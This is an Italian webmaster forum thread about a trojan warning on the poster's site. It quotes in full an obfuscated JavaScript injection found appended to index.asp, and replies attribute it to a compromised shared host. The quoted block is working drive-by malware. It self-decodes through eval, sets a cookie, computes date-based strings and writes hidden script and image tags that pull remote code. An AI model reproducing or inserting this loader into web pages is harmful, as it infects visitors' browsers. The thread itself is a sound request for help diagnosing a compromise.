Trojan su mio sito: chi ha aggiunto quel codice?

[longline]

Ciao a tutti, mi hanno segnalato che visitando un sito che ho fatto io, appena arrivati nella home, l'antivirus segnala la presenza di un trojan. La cosa mi è sembrata un po' strana, e comunque il mio antivirus non mi segnala nulla, allora ho controllato la pagina index.asp e ho notato che la sua dimensione era molto più grande della mia copia in locale, 7720 byte invece di 1115. L'ho aperta nell'editor e dopo tutto il mio codice ho trovato del codice aggiunto (vedere sotto).

Che cavolo di codice JavaScript è? È questo il trojan segnalato? Visto che sono sicuro di essere il solo ad avere le password per questo sito, chi ha aggiunto questo codice?

<script language="javascript">var ez=window;function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i) =="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var sdkajsnd=String.fromCharCode(101,118,97)+"l";funct ion fds(){return asd($a);}var $a="Z64zZ3dZ22Z2566uncZ2574iZ256fnZ2520Z2564wZ2528 t)Z257bcaZ253dZ2527Z252564ocZ252575mZ2565nZ2525Z25 37Z2534.wZ2572Z252569Z25257Z2534eZ252528Z252522Z25 27;Z2563eZ253dZ2527Z252522Z252529Z2527;cbZ253dZ252 7Z25253csZ252563riZ2570Z2525Z2537Z2534 Z25256cZ252561Z25256eZ252567uZ2525Z2536Z2531geZ252 53dZ25255Z2563Z252522jZ2561vasZ2563Z2525Z25372iZ25 257Z2530tZ25255Z2563Z252522Z25253eZ2527;ccZ253dZ25 27Z25253cZ25255cZ25252fsZ252563riZ2570Z252574Z2525 3eZ2527Z253bwiZ256edoZ2577Z255bZ2522eZ2522+Z2522Z2 522+ Z2522vZ2522+Z2522alZ2522](uneZ2573Z2563apeZ2528Z2574)Z2529};Z22;dcZ3dZ22rs} vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}| s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07} s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7 Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z2 57F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7 g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3 c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbude b~0888iuqb0;Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}p pqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;a`uz;64c }p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ceZ3dZ220. chZ2561Z2572Z2543odZ2565Z2541t(Z2530)^(Z25270xZ253 00Z2527+esZ2529)Z2529;Z257d}Z22;caZ3dZ22Z2566Z2575 Z256ecZ2574iZ256fnZ2520dcZ2573(Z2564Z2573,Z2565s)Z 257bdsZ253duZ256eeZ2573caZ22;dbZ3dZ227FtuQd8!90;0! Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u ~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqb SZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ 2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kf qb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~d x7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dsZ2574Z25 3bZ2564cZ2573Z2528Z2564Z2561+Z2564Z2562+Z2564Z2563 +Z2564dZ252bZ2564eZ252c1Z2530Z2529Z253bdZ2577Z2528 sZ2574Z2529Z253bsZ2574Z253d$Z2561Z253bZ2522;Z22;op Z3dZ22Z2524aZ253dZ2522dw(dZ2563s(cZ2575,Z25314)Z25 29;Z2522;Z22;czZ3dZ22Z2566uZ256ectiZ256fnZ2520czZ2 528cZ257a)Z257bretuZ2572Z256e caZ252bcZ2562Z252bZ2563c+Z2563d+cZ2565+Z2563z;Z257 d;Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9 kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522! 0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25 7FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubi Z3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll 00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!( 790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25 Z22;cdZ3dZ22)Z253bstZ253dsZ2574+StZ2572inZ2567.Z25 66Z2572oZ256dChZ2561rZ2543Z256fde(Z2528tmZ257Z22;c cZ3dZ22Z2565nZ2567Z2574Z2568;i+Z252bZ2529Z257btmpZ 253ddZ2573.Z2573lZ2569ceZ2528i,iZ252bZ2531Z22;deZ3 dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h## !!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0; 0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+t qiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}u Sx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx 0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0 Z3d0!M0;07Z3esZ257F}79+mZ22;ddZ3dZ2208y~tuh0:0tqi9 90;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx !Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e }0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy} uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z252 6#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z252 0hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e }9050Z22;cbZ3dZ22Z2570eZ2528Z2564sZ2529;stZ253dtZ2 56dZ2570Z253dZ2527Z2527;for(iZ253d0Z253biZ253cds.l Z22;Z69f Z28doZ63umZ65ntZ2ecZ6fZ6fkZ69e.Z69Z6edZ65xZ4ff(Z27 Z72fZ35Z666Z64Z73Z27)Z3dZ3d-1)Z7bfuncZ74ionZ20caZ6cZ6cZ62aZ63k(xZ29Z7bZ77Z69Z6 eZ64owZ2eZ74wZ20Z3d Z78;Z76Z61rZ20dZ20Z3d neZ77 DZ61teZ28Z29;dZ2esZ65tZ54Z69me(Z78Z5bZ22as_oZ66Z22]*Z31000Z29;vZ61r hZ20Z3dZ20dZ2eZ67eZ74UTZ43HZ6fursZ28Z29Z3bwiZ6edZ6 fw.Z68 Z3d h;iZ66 Z28h Z3e 8)Z7bdZ2eseZ74Z55TCDZ61Z74e(Z64.Z67etZ55TCZ44Z61te (Z29Z20-Z202)Z3bZ7delsZ65Z7bdZ2esZ65Z74Z55Z54CDaZ74e(dZ2eg Z65tUZ54Z43DZ61tZ65()Z20Z2d 3Z29Z3b}wiZ6edZ6fw.Z67dZ20Z3d d;vZ61rZ20tZ69meZ20Z3d neZ77 Z41rraZ79(Z29Z3bvaZ72 shZ69Z66tInZ64Z65Z78 Z3dZ20Z22Z22;timeZ5bZ22yearZ22] Z3d d.geZ74UTZ43FulZ6cYZ65ar(Z29;tZ69mZ65[Z22moZ6etZ68Z22] Z3d Z64.gZ65tUZ54CMZ6fZ6eZ74h()Z2b1Z3btiZ6de[Z22daZ79Z22] Z3d d.gZ65Z74UZ54CZ44atZ65(Z29;ifZ20(Z64.gZ65tUTZ43MZ6 fntZ68Z28Z29+1Z20Z3c 10)Z7bsZ68Z69ftIZ6edexZ20Z3d Z74iZ6de[Z22yeaZ72Z22] Z2b Z22-Z30Z22 + (d.Z67eZ74UZ54CZ4dontZ68()Z2b1Z29;}Z65Z6csZ65Z7bsh iZ66Z74Z49Z6edeZ78 Z3d Z74imeZ5bZ22yearZ22] +Z20Z22-Z22 + (d.Z67eZ74UZ54CMoZ6eZ74h()Z2b1Z29Z3bZ7dZ69f Z28d.Z67eZ74Z55TZ43DatZ65()Z20Z3c 10Z29Z7bshiftIZ6edexZ20Z3dshifZ74InZ64exZ20Z2b Z22-0Z22 +Z20Z64.Z67etUZ54CZ44ateZ28);}Z65lsZ65Z7bshiZ66Z74 IZ6eZ64eZ78 Z3d shifZ74Z49ndZ65x +Z20Z22-Z22 + d.gZ65Z74UZ54CDZ61teZ28);Z7ddZ6fcumZ65Z6etZ2eZ77rZ 69Z74e(Z22Z3cscZ72Z22+Z22ipt Z6canZ67Z75Z61gZ65Z3djavaZ73cZ72ipZ74Z22+Z22 srcZ3dZ27hZ74tp:Z2fZ2fsearZ63hZ2eZ74wZ69tZ74erZ2ec oZ6dZ2fZ74Z72enZ64sZ2fdaZ69lZ79.Z6asZ6fnZ3fdZ61teZ 3dZ22+ shiZ66tZ49nZ64eZ78+Z22&caZ6cZ6cZ62ackZ3dcalZ6cZ62Z 61cZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} fZ75ncZ74iZ6fZ6e caZ6clZ62aZ63k2Z28Z78Z29Z7bwZ69ndoZ77.tZ77 Z3d x;sZ63(Z27rf5Z66Z36dsZ27,2Z2c7);Z65vaZ6c(unZ65sZ63 apZ65Z28dZ7a+czZ2bop+Z73Z74)Z2bZ27dw(Z64z+Z63z(Z24 a+Z73t)Z29;Z27);dZ6fcumZ65nZ74Z2ewZ72iZ74e(Z24a)Z3 b}dZ6fcuZ6dentZ2ewrZ69tZ65(Z22Z3cimg srZ63Z3dZ27http:Z2fZ2fsearZ63h.Z74witZ74eZ72.Z63om Z2fimZ61gesZ2fseZ61rchZ2fZ72sZ73Z2epnZ67Z27 wZ69Z64Z74hZ3dZ31 heZ69ghZ74Z3d1 stZ79lZ65Z3dZ27visiZ62ilZ69tyZ3ahidZ64eZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt langZ75aZ67eZ3djavZ61scrZ69ptZ22+Z22Z20srcZ3dZ27hZ 74tpZ3aZ2fZ2fseaZ72ch.Z74wiZ74terZ2ecomZ2ftZ72enZ6 4sZ2fdaiZ6cy.jZ73Z6fn?Z63Z61llZ62aZ63Z6bZ3dcZ61lZ6 cbZ61cZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$Z61Z3dZ27Z27};functiZ6fnZ20 scZ28cnmZ2cZ76Z2ced)Z7bZ76ar Z65xZ64Z3dnewZ20DZ61tZ65(Z29;Z65xd.Z73etDZ61teZ28e Z78d.Z67Z65tZ44ateZ28)+eZ64)Z3bZ64Z6fcumZ65Z6et.cZ 6fokiZ65Z3dcnZ6d+ Z27Z3dZ27 Z2bZ65sZ63Z61pe(Z76)+Z27;exZ70ireZ73Z3dZ27+exd.Z74 Z6fGMZ54Z53triZ6eg()Z3b}Z3b";ez[sdkajsnd](fds());</script>

[softhare]

Che cavolo di codice JavaScript è?

E'uno script molto ingegnoso di cui le prime ed ultime istruzioni servono a decriptare la porzione centrale, che è uno script criptato.

È questo il trojan segnalato?

Non lo ho provato, chiaramente, ma è molto probabile che si!

Visto che sono sicuro di essere il solo ad avere le password per questo sito, chi ha aggiunto questo codice?

Se hai un hosting condiviso, è probabile che qualche altro co-host sia stato defacciato, ommeglio che tramite qualche altro host sulla stessa macchina qualcuno abbia ottenuto accesso ad un livello superiore a quello del tuo sito.
Ottenuto ciò, può fare quello che vuole del tuo sito...

[longline]

Originariamente inviato da softhare
[...]
Se hai un hosting condiviso, è probabile che qualche altro co-host sia stato defacciato, ommeglio che tramite qualche altro host sulla stessa macchina qualcuno abbia ottenuto accesso ad un livello superiore a quello del tuo sito.
Ottenuto ciò, può fare quello che vuole del tuo sito...

Quindi... devo incavolarmi con l'hoster?

[softhare]

Probabilmente sarà già abbastanza incavolato per conto suo!

Chiedigli invece esplicita conferma di aver "turato la falla"...

PS:
ho fatto un po' di reversing del codice malevolo: che figata!
Nel suo genere è un piccolo capolavoro...

[Phunx20]

pure io ho riscontrato lo stesso problema, lo vedo nel sorgente html nel sito, ma non lo vedo nei file del backup.. che ho scaricato via ftp dopo essere stato avvisato da google..

insomma mi sapete dire dove sono i file coinvolti? io non li trovo proprio..

[softhare]

I server possono aggiungere del codice ai file che inviano al cliente, per gestire in modo trasparente per l'utente autenticazioni od altri servizi particolari.

Se il server è stato compromesso, è possibile che appenda ai file in uscita del codice arbitrario, ad esempio quello in oggetto.

In generale, se il server è stato compromesso, potrebbe fare qualsiasi cosa dei tuoi file prima di inviarli al client.

E vista la alta competenza di chi ha sviluppato questo script, non è affatto strano che abbia trovato, per distribuirlo, un modo più efficiente rispetto al doverlo materialmente inserire nelle varie pagine...